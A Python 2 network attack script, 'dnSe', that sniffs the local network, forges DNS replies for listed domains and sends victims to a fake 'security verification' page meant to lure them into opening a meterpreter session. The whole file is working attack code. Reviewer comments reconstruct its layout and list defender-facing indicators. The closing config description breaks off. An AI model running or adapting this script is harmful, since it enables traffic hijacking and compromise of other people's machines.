# dnSe
# Author: St0rn
#
# Attack combining DNS spoofing with a fake page that asks for a
# "security verification" (social engineering). The page stays stuck on the
# "Verification Page" until the connection (meterpreter or other) is
# established; once it is, the host in question is taken out of the DNS
# spoofing. Host discovery is automatic and continuous.
#
# argv[1] = shell port ; argv[2] = device
#
# NOTE(review): this listing was collapsed onto a few long lines. The line
# breaks and indentation below are reconstructed from the syntax, so the
# nesting of each block should be confirmed against an original copy.
# NOTE(review): Python 2 source (print statement, low-level `thread` module).
#
#!usr/bin/env/python

import os
import sys
import string
import thread
from scapy.all import *

######################### List ########################

# Module-level state shared by the three sniffer callbacks.
# No lock is visible around these lists although two callbacks run in
# separate threads.
file_list = []      # raw non-comment lines read from dns.spoof
host = []           # source IPs seen in ARP replies
black_list = []     # IPs for which a TCP packet to the argv[1] port was seen
domain = []         # column 1 of dns.spoof: names to answer for
domain_type = []    # column 2 of dns.spoof: record type put in the answer
spoof_ip = []       # column 3 of dns.spoof: rdata put in the answer

################## Read file Function #################

# Load dns.spoof from the current working directory into the three parallel
# lists domain / domain_type / spoof_ip (same index = same entry).
# Lines whose first character is '#' are skipped; every other line is split
# on a single space and must provide at least three fields.
def read_file():
    try:
        file = open('dns.spoof', 'r')
        while 1:
            line = file.readline()
            # readline() returns "" only at end of file.
            if line == "":
                break
            if line[0] != '#':
                file_list.append(line)
        file.close()
        for i in range(len(file_list)):
            split = file_list[i].split(" ")
            domain.append(split[0])
            domain_type.append(split[1])
            spoof_ip.append(split[2].replace("\n",""))
    except:
        # The bare except also catches the IndexError raised by a line with
        # fewer than three fields, so the message below is printed for
        # malformed content as well as for a missing file.
        print "\n\033[91mCan't open Domain File\033[0m"
        sys.exit()

###################### ARP Discovery ###################

# Per-packet callback: record the sender IP of every ARP reply (op == 2)
# that is not already in `host`. Discovery is passive; nothing is sent here.
def arp_sniff(p):
    if p.haslayer(ARP) and p[ARP].op == 2:
        if p[ARP].psrc not in host:
            host.append(p[ARP].psrc)
            print "\n\033[31m Host " + p[ARP].psrc + " added to Host List\033[0m"

# Run an unfiltered capture on `device` and hand every packet to arp_sniff.
# Any exception raised by the capture ends this thread via sys.exit().
def sniff_arp(device):
    try:
        sniff(prn = arp_sniff, iface = device)
    except:
        print "\n\033[91m Can't launch ARP Discovery sniffer :'(\033[0m"
        sys.exit()

################### Detect Session #####################

# Per-packet callback: the first TCP packet whose destination port equals
# argv[1] puts its source IP in `black_list`, which attack() treats as an
# exclusion list. Only the port is compared; TCP flags and the destination
# address are not checked.
# Forensic artefact: one ACCEPT rule per such IP is appended to the local
# INPUT chain, and no code visible here removes it again.
def detect_session(p):
    if p.haslayer(IP) and p.haslayer(TCP):
        if p[TCP].dport == int(sys.argv[1]) and p[IP].src not in black_list:
            black_list.append(p[IP].src)
            # The rule text is built by string concatenation and executed
            # through the shell; the variable part is the packet's source IP.
            os.system("iptables -A INPUT -p udp --sport 53 -d " + p[IP].src + " -j ACCEPT")
            print "\n\033[92m Session Detected\033[0m"

# Run an unfiltered capture on `device` and hand every packet to
# detect_session. Any exception raised by the capture ends this thread.
def sniff_session(device):
    try:
        sniff(prn = detect_session, iface = device)
    except:
        print "\n\033[91mCan't launch Session Detect sniffer :'(\033[0m"
        sys.exit()

################# DNS Spoofing Attack ###################

# Per-packet callback for DNS queries (UDP + DNS, no answer record).
# When the queried name is listed in `domain`, a DROP rule for UDP source
# port 53 from the queried resolver is appended to the local INPUT chain,
# and, if the client is in `host` and not in `black_list`, a forged answer
# is sent back to it with addresses and ports swapped.
#
# Indicators visible in this code that a defender can match on:
#   - the forged answer always carries ttl = 1337;
#   - header fields are hard-coded (rd = 0, ra = 1, aa = 0, z = 8,
#     opcode = 16) instead of mirroring the query; opcode is a 4-bit field
#     in the DNS header, so 16 is out of range and how scapy encodes it is
#     not shown here (TODO confirm on a capture);
#   - the Ethernet source of the answer is copied from the query's Ethernet
#     destination rather than being the sender's own address;
#   - a DROP rule is appended on every matching query with no de-duplication
#     and no cleanup, so the operator host's INPUT chain keeps growing.
# Only plaintext DNS is handled (the capture filter in the main section is
# "udp port 53"); nothing here signs answers, so a validating resolver path
# (DNSSEC) or an encrypted transport to the resolver is outside what this
# callback can answer for.
def attack(p):
    if p.haslayer(UDP) and p.haslayer(DNS) and not p.haslayer(DNSRR):
        l = len(p[DNS][DNSQR].qname)
        # qname[0:l-1] drops the last character of the queried name,
        # presumably the trailing root dot (TODO confirm); the effect of
        # the extra [0:l-1] index on the DNSQR layer is not clear from here.
        if p[DNS][DNSQR][0:l-1].qname[0:l-1] in domain:
            os.system("iptables -A INPUT -p udp --sport 53 -s " + p[IP].dst + " -j DROP")
            if p[IP].src in host and p[IP].src not in black_list:
                ether = Ether(dst = p[Ether].src, src = p[Ether].dst)
                ip = IP(dst = p[IP].src, src = p[IP].dst)
                udp = UDP(sport = p[UDP].dport, dport = p[UDP].sport)
                # Transaction id and question section are copied from the
                # query; every other header field is a constant.
                dns = DNS(id = p[DNS].id, qr = 1, opcode = 16, aa = 0, tc = 0, rd = 0, ra = 1, z = 8, rcode = 0, qdcount = 1, ancount = 1, nscount = 0, arcount = 0, qd = p[DNS].qd)
                # Index into the parallel lists filled by read_file().
                nb = domain.index(p[DNS][DNSQR].qname[0:l-1])
                dns.an = DNSRR(rrname = p[DNS][DNSQR].qname[0:l-1], type = domain_type[nb], rclass = "IN", ttl = 1337, rdata = spoof_ip[nb])
                payload = ether/ip/udp/dns
                # iface_hint lets scapy choose the outgoing interface from
                # its route to the client address.
                sendp(payload, verbose = 0, iface_hint = p[IP].src)
                print "\n\033[94m " + p[DNS][DNSQR].qname[0:l-1] + " answer by " + p[IP].src + " spoof to " + spoof_ip[nb] + "\033[0m"

######################### Main ###########################

# Entry point: needs two arguments (listen port, interface). Loads
# dns.spoof, starts the ARP-discovery and session-detection captures in two
# background threads, then runs the DNS capture in the main thread.
# The iptables calls above and raw capture/injection normally require root;
# no privilege check is visible here.
os.system("clear")
if len(sys.argv) < 3:
    print "\nUsage: dnSe.py <Listen port> <interface>\n"
else:
    read_file()
    try:
        thread.start_new_thread(sniff_arp, (sys.argv[2], ))
    except:
        print "\n\033[91mCan't start thread\033[0m"
        sys.exit()
    try:
        thread.start_new_thread(sniff_session, (sys.argv[2], ))
    except:
        print "\n\033[91mCan't start thread\033[0m"
        sys.exit()
    try:
        # BPF filter: only UDP port 53 traffic reaches attack().
        sniff(filter = "udp port 53", prn = attack, iface = sys.argv[2])
    except:
        print "\n\033[91mCan't launch Attack sniffer :'(\033[0m"
        sys.exit()

###########################
#dns.spoof:
#
#Domain type spoof_ip
#Keep exactly one space
#between the arguments.
#Comments are ignored
#and are of the form:
#
St0rn